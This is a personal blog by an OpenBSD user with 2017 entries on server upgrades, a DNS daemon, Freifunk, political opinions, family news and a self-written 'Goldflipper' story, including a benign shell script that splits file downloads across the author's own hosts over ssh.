I know I have a lot of these but I really need one over in Canada. It's
a $10/mo digital ocean VPS in Toronto. I hope it sees use.
The North Sea's deepest point
March 8th, 2017
In the north sea, north of Germany, there lies not far from Norway the
Norwegian Trench. It is as deep as 700 meters. This is the only point
where the north sea is 700 meters so it makes sense that the norwegian
trench is the intended place for these "power" spheres that are pumped
storage facilities, as the Fraunhofer Institute for Wind Energy and
Energy Systems Engineering has envisioned. So I looked a little at this.
I tilted my head a little and thought, that would make an incredible
underwater replenishing station for submarines. If enough power spheres are
made it won't be immediately noticeable that they would repurpose some to be
hydrogen storage containers. Hydrogen? What for? Well if you haven't
heard by now Type 212 submarines of the German Navy use hydrogen to get their
power. And did Norway have the same subs? Well yes. They just ordered a
batch of four from Germany last month. So there is the operators of the
replenishing facility. Only problem is: Can Type 212 subs dive to 700 meters?
And I checked on wikipedia and the answer is, yes. So perhaps there is a
military mandate as well as the economic mandate for these power spheres.
I gotta admit I really used my imagination to the fullest here, and used
wikipedia to back up hypotheses. Would be something right? If there was a
submarine base just off Bergen? BTW Bergen is strategic, in all my games
of the submarine simulation "Red Storm Rising" as a youth it was the Soviets
that would capture Bergen first and a submarine had to stop the landing
crafts. It was usually that the Soviets succeeded in taking most of Norway
and Germany, so if that's in simulations it must have been a fear. Red Storm
Rising was a game that probably had navy advisors as common knowledge would
have never been enough to make that game as real as it is.
OpenBSD 6.1 will be released on May 1st
March 8th, 2017
Once that release is done, I'll be upgrading computers around here, and I'll
get a new domain too, as I want to run delphinusdnsd in production somewhere
with a test domain. I have the capacity to do this now with the new VPS.
Also I've been thinking around how to better the database with delphinusdnsd
which uses BerkeleyDB from Oracle as it's underlying database. I may have to
rewrite the database entirely and make a shared memory hash table. Time will
tell and it will tell if OpenBSD will upgrade BerkeleyDB or not. Currently I
believe it's at 4.6.21p3.
A thought just came...are humans in the way?
March 12th, 2017
Brexit came at an interesting time. This time we realise that human resources
for labour are starting to dwindle. This is not because of a lack of humans.
In fact we have more humans than ever. But I'm talking about automation.
About a decade ago I attended gatherings of laid-off personell and other job
seekers and I remember one lady was among the first victims to digitalization.
She was a photo developer working for Kodak or some company, and was laid off
because digital cameras replaced analog film cameras. I predict in a decade or
two time I will again be visiting those meetings as the System Administrator
who was replaced by Artificial Intelligence.
Then there is Great Britain whose
humans voted for exiting the EU. This can be a chance for britain to up its
manufacturing as automation only and to develop its AI backed with quantum
computer technology. A quantum computer on that small island is almost a
saviour when comparing the island with the human resources of the continent
Europe. Britain can enter as a guardian and security analyst by checking
Internet traffic that transits its country en-masse with artificial intelligence
and quantum computers and thus it might get a pretty good picture of what a
single firewall state or flow is about to do. It can then sell this information
to 3rd parties or governments. What this leaves the british public with is
unknown. Either everyone is gonna travel the world and hardly be home while
computers do all their work, or they'll be locked up in their house and using
virtual reality to entertain themselves. Would this create a nation of
VR addicts? Is that life really satisfying?
And lastly I want to throw in why basic income is perhaps a good thing in times
where industry is automated. We should be persuing a model for humans that
allows us a satisfying life (since our economy is rolling) and much like in
the series Star Trek TNG humans try to better themselves intellectually and
spiritually. Unfortunatly the speed at which automation happens is faster
than the speed at which politics are realising that humans will be out of
work and temporarily or permanently depressed about this state. We need to
make it clear that yesterdays politics need to be replaced by todays needs.
I did this change because RFC 7208 section 3.1 says that SPF records were
discontinued. Finally someone told me! lol.
Let's just end this here
March 14th, 2017
Turkey is just using Germany and the EU, to get support for its already
anti-EU course. Why should they be in the EU? They shouldn't. The
differences between Turkey and the EU are too great. Turks might feel
offended by Europes stance, but this is not your country that you pledge
allegiance to! Unfortunately we have to watch all the human rights abuses
come out of Turkey, just to prove a point that they are different. Why do
we need them in NATO? How strategic is a dictator run Turkey to NATO? We
don't need them! Let this end. It's better this way.
We're 10 cm's from the Sun (1mm)
March 16th, 2017
I saw this youtube
clip partially until he set the distance to Jupiter. If the Sun was 1 mm in
diameter (radius off wikipedia says 695,700 km) then the earths to scale
distance I worked out to 107 mm or 10.7 cm given that the distance of an
astronomical unit (AU) is 149,597,870 km. In the video astrium goes on to
say that Mars is 16 cm's from the Sun. I proofed the distance with earth
today and had some discrepancies until realising that 2 * radius == diameter.
:-)
The only way to outdo Facebook/Google/Silicon Valley and Co.
March 19th, 2017
When european politicians talk about restricting facebook for example, it won't
do. The only way to beat facebook and apply european law is to create a
competitor platform that offers more than facebook, ie. competing against it.
We are eons behind in this so it's not easy to outdo facebook and google. But
if politicians would have the will to work with private enterprises to create
a competitor platform by investing billions (that's how much it would cost),
then and only then will the european user be under a european law-umbrella.
Politicians don't realise this though. They think it is sooo easy to create
a digital border in "cyberspace". It won't do. Half the people on facebook
are addicted to it and emotionally bonded to it. The only way to break the
spell is to break it with another spell, like mentioned above. With european
law there must come law evolution meaning that some laws are perhaps not in
europes best interests, and serve only a minority. Anyhow. Here is a question
to local politicians then "how long will europe have to be beaten
technologically for you to realise politics can't save us?". Put up.
Tomorrow is Equinox
March 19th, 2017
At 10:28 UTC is equinox. That is when the sun crosses the equator of earth.
You may have guessed then, that this only happens twice a year. Officially
after the sun crosses the equator in either direction somewhere on earth it
is spring and otherwhere on earth it is autumn. Namibia is starting autumn,
and Germany is starting spring. That's just how it is in the march equinox.
When Algorithms Fail Humans
March 23rd, 2017
I sent a resume to some place that was hiring. Their algorithm scored my
mail as a spam mail due to the .pdf attachment that was my resume. I sent
a followup a few weeks later asking if they saw my resume and by then they
realised that my mail was not spam. Unfortunately for me, the position for
the job was then already filled. I believe this is one case where an
algorithm failed humans. Or is it sheer bad luck? Between the mailings
I changed my SPF record to a TXT record as per RFC 7208, which changed in
April 2014 and my anti-spam setup was outdated.
Last night Europe turned on Summer Time
March 26th, 2017
When I type date on a UN*X system it says this:
Sun Mar 26 10:52:20 CEST 2017
ahhh! finally summer time CEST! I was once vehemently against the switch
at all, but now I just don't care anymore. It would be nicer to have no
summer time but then again, who cares!
Ex-Ledward Barracks starting to be demolished
March 26th, 2017
On December 9th, 2014
I reported about the American Forces leaving Schweinfurt. Now there is the
first demolishing of the old Barracks I just
read
in the mainpost our local newspaper. They have designated the east wing of
the barracks for schooling, in particular the local college FH W"urzburg-
Schweinfurt. I haven't seen it in real life yet but I'm sure one would not
recognize it again. Strangely I read somewhere a few weeks ago that the US
Army is seeking for new Barracks in Northern Germany. That is ex-british
territory in the division that happened after WW2. I disagree with President
Trump that Germany "owes" the US money over protection. The remaining US
forces in Germany are remains of the second world war of an invasion force,
why would we pay a cent for that? Why we'd be crazy. Our military can be
modified to give us a reasonable protection without NATO forces on our soil,
and in a jiffy at that. Anyhow "interests" cost money so much is clear. And
it's in the US best interest that Germany doesn't get invaded by the Russians
even if Germany doesn't pay the Trump government. In regards to conscription
which is something Sweden re-introduced recently, there is probably a chance
that Germany will re-introduce it too in the foreseeable future to come. This
is simply because when forced there is more potential good soldiers that become
"career" soldiers. Currently the advertising of the Bundeswehr is probably not
effective in finding the right persons. That's just a prediction of mine, as
I don't really know as I never had to serve because I lived in a foreign
country at the age when people get conscripted. So I barely missed out.
What science should focus on in my opinion
March 27th, 2017
Science in all of history has largely been a trial and error method. There
was a hypothesis and if some work surrounding that hypothesis matched then
there was material for a positive conclusion. In these days we have a great
system of many many hypothesis's and we get a bit of positive conclusions out
of it.
I personally get angry when I see people working with rare elements and
"waste" their time with it. Such as gold. Why gold? Just because some guy
put it on his crown and shield and it looks nice why do we waste our time
with it? It has no value to me.
I personally would like to see scientist try out the most abundant elements
that we have on earth (32.1% iron, 30.1% oxygen, 15.1% silicon,
13.9% magnesium 2.9% sulfur, 1.8% nickel.. stop). Let's work with the ones
that are over 10% so iron, oxygen, silicon and magnesium. Also we should look
to the Universe and see what elements are abundant there. Hydrogen and Helium.
So we have six elements that we should be focusing science around. Forget the
rest they aren't important enough! One element we could be working with is
Carbon but let's keep it at that. So seven elements in total.
I have dug up this chart from wikipedia which I find pretty interesting:
We should be doing science with the most abundant of elements because there
may come a time when we're short of everything and can only use what's
immediately available. Does it not make sense? To me it does.
Totally disagree with this SP.ON. article
March 27th, 2017
In this article
on Spiegel Online the author fingers the EU and US industry at trying to
weaken Germany. Dieselgate is the cause of that, but it was braught about
by whom exactly? You got it. VW. And then he goes on to say somewhere in
the article that up to 2 million people are indirectly dependent on the car
industry and that if everyone bought an electric car that there would be job
losses because the car makers are getting less money per e-car than any other
emissions car. Now, I've been on the search for an electric car for the last
little while and I smell hot air from this guy. For one, an electric car costs
three times as much as it's emissions counterpart (Renault Zoe vs. Clio) with
batteries included. So if the producers aren't pocketing great profits on
this I'd be surprised. The fact that I mentioned Renault (a french maker) is
that it's still cheaper than the german competition (Opel e-ampera, BMW, and
VW E-Up and E-Golf), yet it's still expensive. Maybe he overlooked that many
people want an electric car in this country and that the local automakers are
letting us down. They slept, they lied and played with fire at dieselgate.
And we're supposed to feel sorry for job losses? We should buy a friggen
emissions car to keep some assmunch in their job and all they do is turn around
and lie to us? No. I totally disagree with this guys sob story and I'll buy
me a Zoe from surprise surprise not the korean dealer but the next
neighbouring country over. VW should roast and pay up, because VW not only
tarnished it's own leadership, engineering and staff but also all of Germanys
reputation of honest craftsmanship and engineering. You guys can bring all
the sobstories you want, you don't get me feeling sorry for you.
Turned down the heat
March 27th, 2017
My "Nachtspeicher" heating system is turned down to 2 hours now, and I have
set the setting on the units themselves to level 1. I hope I don't freeze,
but today is extraordinarily warm in my apartment.
Reinhard Tgahrt, Rest In Peace
April 1st, 2017
Sadly, not an April Fools joke. Reinhard Tgahrt my uncle passed away last night. He would have been 81
years old on July 4th. What can I say here? Reinhard was an interesting
person and a great uncle. He lived in Marbach not far from his workplace the
Schiller Archive and Museum. I believe he loved his work. He loved poems and
not just simple ones. I would recite one he said but I don't know where to look
all I remember one he said was called "Endlich". I think I could dig out a
long list of things he contributed to in Germanistics but it's all online. He
was a great person, and I'd toast to his life with a pistachio that he loved to
eat so much. I'm gonna keep it short so I'd end the conversation quickly
like he always did with a simple, Adieu!
I've left parship.de, unsuccessfully
April 2nd, 2017
Well I've asked parship.de to delete my profile. I never had any luck finding
anyone, since becoming a premium-member last april 6th, 2016. I think the
service is a scam personally. Thanks for nothing, and they're expensive too.
My Bloomin' System
April 3rd, 2017
Spring here has arrived. When I look out my window, I see this:
Of course it loooks a lot better than in the photo IRL.
I'm ready to go back to dating
April 5th, 2017
After leaving parship.de a thought came to me. Why do I need a middle man to
ask someone out? I have registered
schweinfurtdating.de
and put myself on it. If anyone comes across it they can e-mail me if they
find me interesting. I also want to give others the chance of presenting
themselves on this website. I hope I don't get swamped with the workload.
Instead of 500 EUR for parship.de I paid 5 EUR for the domain, and I have
enough resources to facilitate a bit of webhits. If it gets too bad I'll
move the website around my VPS's a little to balance the bandwidth. Here is
hoping that I'll have a gf in 2017. :-)
I identify with Goldflipper from OpenBSD 3.2 Release
April 8th, 2017
I identify with goldflipper. That's why I even registered the
domain
goldflipper.net before. If you may know Puffy dressed as 077 (ascii sign for '?')
as a dupe to 007 (james bond) destroyed goldflipper a cyborg made by "the
doctor". There is several hints that goldflipper is me. 1. Flipper is a
common name for my last name as a word of taunt. 2. My dad is the doctor and
was called so at his work even. 3. When I left Canada as my place of
residence after having a very hard time in Ottawa, OpenBSD 3.2 came out with
a taunting "goldflipper is gone". Just for your information puffy did not
destroy goldflipper, but rather had him go back to square one, for repairs.
I didn't even know what hit me, and I sure as hell did not expect puffy to
take me out. All is good now, I know now where puffy stands, not only did
he do Goldflipper but also came out with Blob in 3.9. Keywords bonding 3.2
and 3.9 are again goo and doctor. Check the lyrics and compare
(in this link). I don't think
I'm mistaken, puffy did his homework through some sorts of spying, he was
very informed about where I came from and about my family. Noone would have
known about "the doctor", I never told that to anyone until recently.
So where does that leave me? I'm old now compared to these younglin's and
fairly retarded due to the meds I'm on. I'm not even gonna counter-attack
I don't think. I'm just deeply hurt that puffy took me out. Now I'll give
you another piece of the puzzle. I once taunted puffy with means of a
donation, where I provided a small poem pitting the city of Toronto against
the city of Calgary with it's pathetic mayor at the time Ralph Klein. Then
again at the time Toronto had pretty dull mayors too, I think it was
NOOOOOOBODY's Mel Lastman. It may seem like fun and all, but let this be
a warning to anyone in Canada before you get into a spat with someone.
Especially immigrants who don't have a status beyond landed immigrant
should watch out. Puffy throws acids such as LSD!
Very low. Very low. It was a blow, deep below the waist
But make no haste, we know without a doubt that puffy was the taste
And let this poem stand, for only one ruler rules the band
the devil with his left-side glory does not control the sand
Because sand is made of rock, and rocks are forever
And this connection from near and far will never sever
For a tear from my eye will fall and drops will appear as ice
cling cling clang rattle bing bang I'll make my noise all winter
spring, summer and fall, you'll never get me all, I'm out.
Puffy may have a sample of blob, but I have sample of bluffy!
First draft of the Goldflipper story
April 11th, 2017
(pictures and illustrations to come later)
A long time ago.. more than one revolution of Jupiter around the Sun, puffy
who was notified by octupus that goldflipper is its foe, which was a blatant
lie, destroyed Goldflipper and told the story in song, as a taunt.
When Goldflipper the cyborg was "destroyed" by octupus and puffy, it was able
to catch a flight to India on a TWA airliner. Just before reaching the EU for
a refuel stop goldflipper released itself from the airplane and dug into the
North Sea and dug deep into the sand near the Norwegian Trench.
It's systems were mostly overloaded. That was the part damaged from puffy's
neurodotoxin and octopus's psyops. The fission reactor almost had an accident.
There lay goldflipper and didn't make a noise, deep under the sand. Right near
a pocket of oil.
Soon the EU flipper family noticed that there was something deep under the sand
by means of sonar. Flippers have a tendency to scout for food under the sand.
There they found him breathing but not well. They took him into shlepp tow and
brought him to port.
Since Goldflipper had very little battery left they first gave him a coat of
black solar scales, so that the sun could power goldflipper. They repaired
the fission reactor but shut it down. It was not common for flippers to use
fission reactors anymore in the 2000's, goldflipper was a real blast from the
past.
Next the flippers gave him new non-magnetic steel frameworks allowing
goldflipper to keep its balance better, and also outfitted a fuel cell for
extra power that was scouted by the flippers during a "wandertag" in Franconia.
A set of Li-Ion batteries were installed as well, much later due to the finding
that a fuel cell with battery combination is a much better combination for
cyborgs.
By now goldflipper was mostly black. Under its skin was still a bit of gold
but it was mostly covered up by black scales and oil that kept oozing out of
goldflipper due to its repairs caused by the fight with octupus. Puffy once
came around and called him "Blobby" because it reminded him of a whale. At the
sight of the taunting puffy goldflipper almost lost its cool and destroyed
some Puffy CD's out of its library.
Nonetheless the Flipper family did a good job in repairing goldflipper, but
everyone was getting old and tired of the task. One flipper caught the
neurodotoxin from puffy and was sickened so bad she had to be put in a
wheelchair. The time was right for goldflipper to tell its story, when Jupiter
made a full revolution from the constellation Virgo, which had the sun in it
when Puffy and Octupus attacked Goldflipper. Goldflipper who was a virgin
reborn due to the repairs felt that now was the right time to tell.
Soon goldflipper would be able to show its new armour and insides to the world.
It amassed a lot of RAM and CPU power over the years. It could let everyone
know that it survived the attack by puffy and octopus, which
was already told to the caribbean sea many moons ago, but that was a different
story. Revenge on puffy is probably not a good idea, but octopus may have it
coming, because puffy noticed octupus told him lies. Only time will tell.
Goldflipper lives!
OpenBSD 6.1 was released yesterday
April 12th, 2017
Congratulations to the entire team that find time to give us the best
OpenBSD OS yet.
Registered Goldflipper.DE
April 12th, 2017
I once had goldflipper.net but this time a .de is cheaper. The funny thing
I noticed is when you compact goldflipper to AUflipper it sounds like someone
who gets lippy. That's me for sure, in my younger days.
Upgraded most my servers and hosts to OpenBSD 6.1
April 14th, 2017
I was very busy yesterday and today upgrading most my hosts to OpenBSD 6.1.
The upgrade process was straight forward and I don't have any complaints.
Thank you OpenBSD!
Purchased/Ordered a Wacom CTL-490DW
April 17th, 2017
OpenBSD has support for this wacom tablet and I have a need for doing some
drawings or illustrations. Hopefully it'll work out.
Von der Leyen and Bundeswehr should listen to this
April 18th, 2017
I've always said that networks and computer systems should be defensive only.
However the German Bundeswehr insists
on installing "active" offensive network mechanisms. In my opinion this is the
wrong way about this. Bruce Schneier a cryptography expert agrees that there
must be a balance. In my opinion, what Germany really needs is a secure
operating system and secure network
infrastructure, not a bunch of smurfers or DDos'ers. The OpenBSD operating
system which focuses on correctness, security and functionality has a few
innovations that help
in this field. Trust me, this is the correct way. Active attack is so wrong
in the eyes of a system and network administrator such as me. You guys need
to learn! And by that I mean that the Internet is very delicate, and any
nonsense such as "cyberwar" will not go over well.
Got the Wacom CTL-490
April 21th, 2017
Well I got the Wacom. I unwrapped it... plugged it in. and I see this in my
dmesg:
uhidev3 at uhub0 port 8 configuration 1 interface 2 "Wacom Co.,Ltd. Intuos PS" \
rev 2.00/1.00 addr 5
uhidev3: iclass 3/1, 1 report id
ums1 at uhidev3 reportid 1: 5 buttons
wsmouse2 at ums1 mux 0
I didn't work right away, I first had to restart X11 with control-alt-backspace.
Then it really worked! I fired up gimp and made 2 doodle drawings. This is
the second drawing I made with it on OpenBSD and gimp:
I'm very satisfied! Thank you OpenBSD and thank you to the author of the
uwacom(4) driver Frank Groeneveld! I'll be making more detailed illustrations
of Goldflipper in the time to come.
First draft of image of Goldflipper attack
April 21th, 2017
There is more to come.
Second image for Goldflippers attack
April 21th, 2017
Goldflippers escape
April 21th, 2017
Goldflipper is detected
April 24th, 2017
Goldflipper's new solarscale suit
April 24th, 2017
Government issued national ID card online
April 24th, 2017
Before a nation decides to hook everyone to an ID card, I'd like to remind
them that not everyone runs windows. And it is against our democratic right
to be forced to use windows. No, I don't run a Macintosh at all times either.
My OS (betriebsystem) is OpenBSD. If you'd like me to run your ID card, I
expect a fully open sourced driver to my OS. The driver has to satisfy the
OpenBSD developer community in order to be accepted into the base kernel
system. No, it isn't linux and it's not linux compatible! There is a lot of
OS's other than Windows and Macintosh, AND I'm afraid you'll have to satisfy
all instances if you want 100% coverage. This means jobs for developers.
It can be done. Please make it so!
In 6 days we're 8 years old (with history)
May 1st, 2017
Happy anniversary!
Why do we need more than one State-run TV station?
May 8th, 2017
Rumours has it that the state-run TV and Radio stations are wanting to increase
the GEZ tax. Now the question abounds to.. why do we even need more than one
state run TV station? As the "official" voice of the state we don't need two!
In german these state run behemoths are called "Oeffentlich-Rechtliche Sender".
Germany, you're not giving choice, you're milking ordinary citizens dry with
GEZ taxes! Let there be only 1 TV and 1 Radio station that is from the
government. Because even if we switch channels the message coming from the
government will always be the same. There is no difference! Let some die!
And we welcome the digitalization of the state-run TV station and radio.
Goodbye Soekris! Pity to see you go!
May 11th, 2017
Soekris was a small i386/amd64 computer on
a rackmountable or desktop small case. They were driven out of business by
the competition in Asia and what I think was a business mistake. Their long
awaited products never left the drawing board last. I would have bought it
but they scrapped it.
This is my soekris at home but it uses more connections than the one you see.
In fact I utilize 1 external NIC card fully with 1 connection on the second
card.
Goodbye Soekris rest in peace! It was probably the last Made in the USA
computer that I bought, pre-snowden. For all those other manufacturers
that are waiting on business, we want 10-Gigabit ports! Without them we can't
justify buying more equipment. I also want under 20 watts power consumption
on top of that.
Purchased a 4TB external USB3 harddrive
May 18th, 2017
In fact I did this last week even on the 12th. The new drive is amazing. It
can be written to at 70 MB/s, I find that extremely high. And that's only
from copying from the internal drive on my computer "earth" (mac mini) to it,
so it may just be limited to the read speed of earth's internal hd.
First I wanted to encrypt this drive but noticed that I had too many sectors
in order to use softraid's crypt. I guess softraid by default is limited to
2TB unless you fiddle with the sector size which I did not want to do. So I
left it unencrypted, on FFS2.
I already put some backups on this drive:
Filesystem Size Used Avail Capacity Mounted on
/dev/sd1a 3.6T 367G 3.3T 10% /backup
Now you may wonder why i's 3.6 TB here and I said 4TB. Well WD sold this
with the label "1 TB == 1 trillion bytes", so let's do some math.
$ dc
4 1000 * p
4000
1000 * p
4000000
1000 * p
4000000000
1000 * p
4000000000000
1024 / p
3906250000
1024 / p
3814697
1024 / p
3725
It comes very close to 3.6 in fact when I do the last step with a calculator
I get 3.6376953. (dc doesn't give me decimal places in the way I'm using it).
I'm overall pretty happy with this purchase. I've never had this much capacity
before.
Purchased 2 WR-1043ND Routers for Freifunk
May 22nd, 2017
I purchased two more routers for Freifunk. I need these to accellerate my
network at home a little. In other news I'm trying to give out a few
WR-841 routers to stores near here in order to grow the Freifunk in my
neighbourhood. We recently got a new router for Schweinfurt and the Freifunk
Net is gonna rock!
Built an aggregator for big files
May 25th, 2017
I had the problem of getting 8 Mbps downloads across the Big Pond (tm) from
my VPS psi.virgostar.net. So I constructed a little system with scripts and
ssh to aggregate several locations together. Now I get ~30 Mbps.
As you can see this is how it works, each arrow is an ssh connection. BPI is
the Big Pond Internet, the area where I cross the ocean. I checked I get
routes from Tata, Telia and Cogent, so everything is nicely dispersed and they
can't put 2 and 2 together and throttle all my hosts. At uranus I assemble
the temporary files into 1 big md5 summed file. If the md5 sum is fine then
it deletes the temp files. Below is the script from Uranus which does most
the work of chopping up the workload for each host.
#!/bin/sh
if [ $# -ne 1 ] ; then
exit 0
fi
RET=`ssh psi /home/pipe/pipe.sh $1 || echo NSF`
if [ x$RET == x"NSF" ] ; then
echo no such file
exit 1
fi
SIZE=`echo $RET | awk -F: '{print $2}'`
MDSUM=`echo $RET | awk -F: '{print $NF}'`
CHIP=`expr $SIZE / 4096`
date
echo getting 4 chunks of size $CHIP
TMP1=`mktemp 1.XXXXXXX`
TMP2=`mktemp 2.XXXXXXX`
TMP3=`mktemp 3.XXXXXXX`
TMP4=`mktemp 4.XXXXXXX`
BASENAME=`basename $1`
ssh omega /home/pipe/pipe.sh $1 0 $CHIP > $TMP1 &
OFFSET=$CHIP
ssh supercluster /home/pipe/pipe.sh $1 $OFFSET $CHIP > $TMP2 &
OFFSET=`expr $CHIP \* 2`
#OFFSET=`expr $OFFSET + 1`
ssh chi /home/pipe/pipe.sh $1 $OFFSET $CHIP > $TMP3 &
OFFSET=`expr $CHIP \* 3`
#OFFSET=`expr $OFFSET + 1`
ssh psi /home/pipe/pipe.sh $1 $OFFSET 0 > $TMP4
wait %1
wait %2
wait %3
cat $TMP1 $TMP2 $TMP3 $TMP4 > $BASENAME
SUM=`md5 $BASENAME | awk '{print $NF}'`
if [ $SUM != $MDSUM ] ; then
echo sums do not match!
exit 1
fi
echo file is $BASENAME
date
rm -f $TMP1 $TMP2 $TMP3 $TMP4
exit 0
There is intermediate scripts on omega, chi and supercluster and another big
script on psi to make this all work. But I'm not gonna share it all here.
Played with my wacom a few days ago...
May 26th, 2017
Or... from a different perspective:
Go flipper go!
Launched first page of http://goldflipper.de
May 30th, 2017
I have launched the first page, more to follow on goldflipper.de. I think it looks great so far. Also check out the
reload the colour border is randomly created.
Why I think America is greedy, under Trump's presidency
June 1st, 2017
I don't know why Donald Trump thinks America is getting the short end of the
stick in trade. Let's look at some facts. America has a monopoly in data.
You know..google, microsoft, apple, facebook, twitter, amazon, what have you,
those are all american companies. There is not too much competition for these
that I know other than perhaps baidu in China and vzkontakte in Russia. So
while the rest of the world is locked-in to american data brokers, they are
saying they are getting the bad deals. This is greedy! As you may know, data
isn't profitable by itself. But massage it with analysis it is very valuable
and it is powerful. The trick is to run powerful algorithms over it after it's
being collected.
Now, the NSA has access to some of that data and they have
their own data. But the NSA isn't for-profit per se. But they run some of
the same algorithms that for example google might. It's in their interest and
again they have a monopoly of this data in the world. You may remember the
spy plane that was damaged in April 2001 as it was collecting data from cell
phones in China. That is what's called aggressive data collection.
So while perhaps other areas in trade are lacking overall, the "data" cannot
be overlooked. And that's why I think America is greedy.
Registered freifunk-schweinfurt.de
June 8th, 2017
I'm an avid Freifunker and Schweinfurt just got a hood, which means we have
a few gateways (tunneling gateways) for our city and the immediate region.
Anyone from the Schweinfurt Hood can get a hostname in this domain, just
email me, or find me on IRC. The new domain forwards http to the
Freifunk Franken Schweinfurt
section. Yay!
Donation Time: OpenBSD gets 50 EUR
June 8th, 2017
I have donated 50 EUR to Theo de Raadt. OpenBSD is an operating system for
all sorts of computers. Keep up the great work, OpenBSD!
Schizophrenia does not 'burden' society
June 8th, 2017
A friend sent me this article. I read the Objective in the abstract
and stopped reading at the sentence "Given the immense cost to society"...
What costs? I have schizophrenia and I work. I pay my own health insurance,
rent and I take my meds. There is no costs on society. The sentence itself is
self-justifying, in other words selfish. In fact I'll tell you right now
I do not have any "voices from god" telling me to stab someone 3 doors down.
That's not what my illness is about. In fact if I were such a danger to
society then how come I can do everything anyone else can.
Except, it's
harder to find work. Since my diagnosis of schizophrenia I held three jobs.
Two of them I was fired from, the third I'm on right now, and I'm hoping to
be working in the future at some other job. I spent 7 years on welfare and
this was because I could not even convince anyone for a job interview.
Put
yourself in my shoes, first everyone ignores you, and then they say you're
a burden because you don't have work. Let's get rid of the stigmas, because
we're very capable people, and not all of us hear voices. In fact I don't.
Even without medication I do not hear voices, sorry to spoil your fanatical
view of schizophrenics. The problem is people who freak out when they see
someone they identify as a schizophrenic. And perhaps that's a burden to
society.
This is the 1171st article of this blog
June 12th, 2017
I didn't realise I passed 1000 articles here. Even with 10 articles per month
for the last 8 years I've surpassed 960 which is what I figured with
8 times 12 times 10. I'm very proud to be blogging still.
The keyword search engine is very valuable tool as well. I use it often to
find things I wrote about. One day I'd like to change this to an advanced
search where you can use AND, OR or boolean search. But that'll have to
hold for now.
It's also worth noting that this blog does not use an SQL backend. I use
plain files to store the content. I use a small script in UNIX to add
content (articles), and the editor is vi. With all the injection attacks
on SQL I felt that what I did was much safer, but granted it doesn't
scale on large blogs with 10,000's of articles. For my operation this is
still OK.
100 million migrants, due north
June 18th, 2017
A minister in Germany warned that due to the pollution that's output by the
industrialized countries many African citizens may be forced to migrate north.
The numbers are staggering, one hundred million people. I'd like to explore
this scenario a little, at least in my thoughts that I'd like to share.
I believe we have a responsibility to global pollution, it has after all given
us temporary wealth here in Europe. We're currently a changing people.
Industrialization paved way to the
information age, and perhaps physical borders don't matter so much anymore.
However in the EU we have roughly 500 million people, an addition of 100
million Africans would change our society in many ways. One in six people
would be black if I am allowed to imagine that far.
Also our GDP would temporarily fall
as not all Africans are rich, and chances are the poorer ones would migrate
first. Perhaps instead of "integrating" these new people we should melt with
them by meeting them halfway, with a new language. Esperanto perhaps. All
pupils would go to school learn Esperanto as their first language with their
previous language taking a second spot. It solves many problems, to do it this
way as noone has an advantage at least in languages. Now in knowledge we'd
probably benefit as even "the stupid" carry clues. Together we'd be able to
gain a lot of knowledge, while the Information Technology developed helps us
overcome. I'm talking about artificial intelligence.
Then, we'd probably have to make plans to migrate ourselves as well. Destination arctic and antarctic circles. As a northern hemisphere race we may spread into a southern hemispheric race as people settle on antarctica. Antarctica has
a landmass the size of the United States. Migrating north or south.. I have
seen first hand
how this could work, because I visited a school friend who lives just south of
the arctic circle in Canada. There is no trees, yet anyhow. As temperatures
on earth rise perhaps the treeline will spread further toward the poles though.
My friends
dwelling was built with wood. All things are really imported by giant ships
during the summer season. This could work on a large scale for the European
and African people who find themselves needing to move due to climate changes.
Europe is not Europe anymore, and Africa is not Africa. The global conditions
have changed, this is a fact. Cultures disappear, get surpassed by new
cultures. If you are against this cultural shift just look to history. We
were never a culture for thousands of years, it was always dynamic, and we
always had to adjust. It is important that we work together, not to make us
poorer but to survive as a human species. And that's what I think and that's
what I believe would be happening in the next 70-100 years which I will probably
not see.
Solstice in 2 days
June 19th, 2017
Solstice is in 2 days, on wednesday at 6:24 AM CEST, or 4:24 UTC. Happy
solstice!
Turned the fan on first time for 2017
June 19th, 2017
I got the fan out. It's 50 watts which is hopefully gained back by the
countless of solar panels we have in Germany. We should have a surplus in
"green" energy today as there is no cloud in the sky and wind is blowing.
I'm against governments hacking our devices
June 22th, 2017
Hacking (cracking) is illegal. Everywhere in the world. Yet governments want
to bend the rules and hack our devices. This is not just two-faced, it also
goes against our human rights. The PDA or even a smartphone is an extension
of the body and mind. We carry these devices because we want to know the
time, date, location, translate language and have a pointer where we saw
something to make a point to someone else. It allows us better expression.
It is an extension of our body and mind and should fall within privacy laws
for individuals.
If countries hack devices where will it end? Would privacy
erode and we'd be subject to carrying implanted chips? Why all this madness?
Why is there so much mistrust? 99.81 percent of us are good-willed beings and
we don't do what our governments don't want us to do (adhering to the laws).
So why should our security be compromised because of a measly 0.19 percent?
It should not be analysed whether we are in fact adhering the laws, it should
be analysed why others want power over our most private parts. I smell
corruption.
My new xlock with suspend
June 23th, 2017
Now that the german government can install trojans on our computers I have
decided to wrap zzz with xlock so that when I put the computer to sleep, it
will also lock the computer.
That's how the /home/pjp/bin/zzz script looks like. Thanks to abyxcos on IRC
for the discussion.
300,000 victims
June 25th, 2017
What is happening in Yemen is a shame. I'm set against the reasons why there
needs to be war against the Yemeni people. The people are victims of a brutal
onslaught by Saudi Arabia who want power of the entire arabian peninsula.
The cholera in Yemen could have been prevented had there been peace. I have
images of Yemen in my mind before the war, which I saw on television, Yemen
was doing well before.
Changes with DelphinusDNS
June 27th, 2017
Yesterday I completed the a change in delphinusdnsd that takes out BerkeleyDB
and replaces it with tree(3) macros as provided in BSD and libbsd. The code
to that I committed yesterday in delphinusdnsd-current.
To fully test this I have registered delphinusdns.org. I have 6 months on this, and I have made my vps's chi and psi the
authoritative nameservers for this. Hopefully I'll find more time to program
on this good dns daemon before next year.
Donated $10 USD to FreeBSD Foundation
June 27th, 2017
After positive help from some FreeBSD'ers on IRC, I have decided to donate
$10 to FreeBSD. Thanks for helping me make my software work on FreeBSD!
The endless fight around Freifunk
June 29th, 2017
Here in Germany we're suffocating on laws. If there is a law on how to breathe
I wouldn't be surprised. Freifunk which I mentioned in the Subject is an
initiative by citizens to provide a network free of cost to anyone. Most of
the time we also provide Internet access. It's a good service paid for by
the enthusiasts. Only, we're having a hard time growing because everyone is
worried about liabilities, yes you got it, they aren't sure about the laws and
would rather not have it. It's frustrating because approaching municipal
governments and city halls is so much harder. They are so bureaucratic, and
in my case I just got a nay to erect a repeater at a "citizens meet" which is
a place for the people! And I got this nay not because the laws say I can't
but because we're uncertain of the laws.
Now to tell you a little story Feifunk is a great thing. People can use it
when their own Internet doesn't work and we all know everything is tied to the
Internet these days. If you have no access to the Internet ever you lose out.
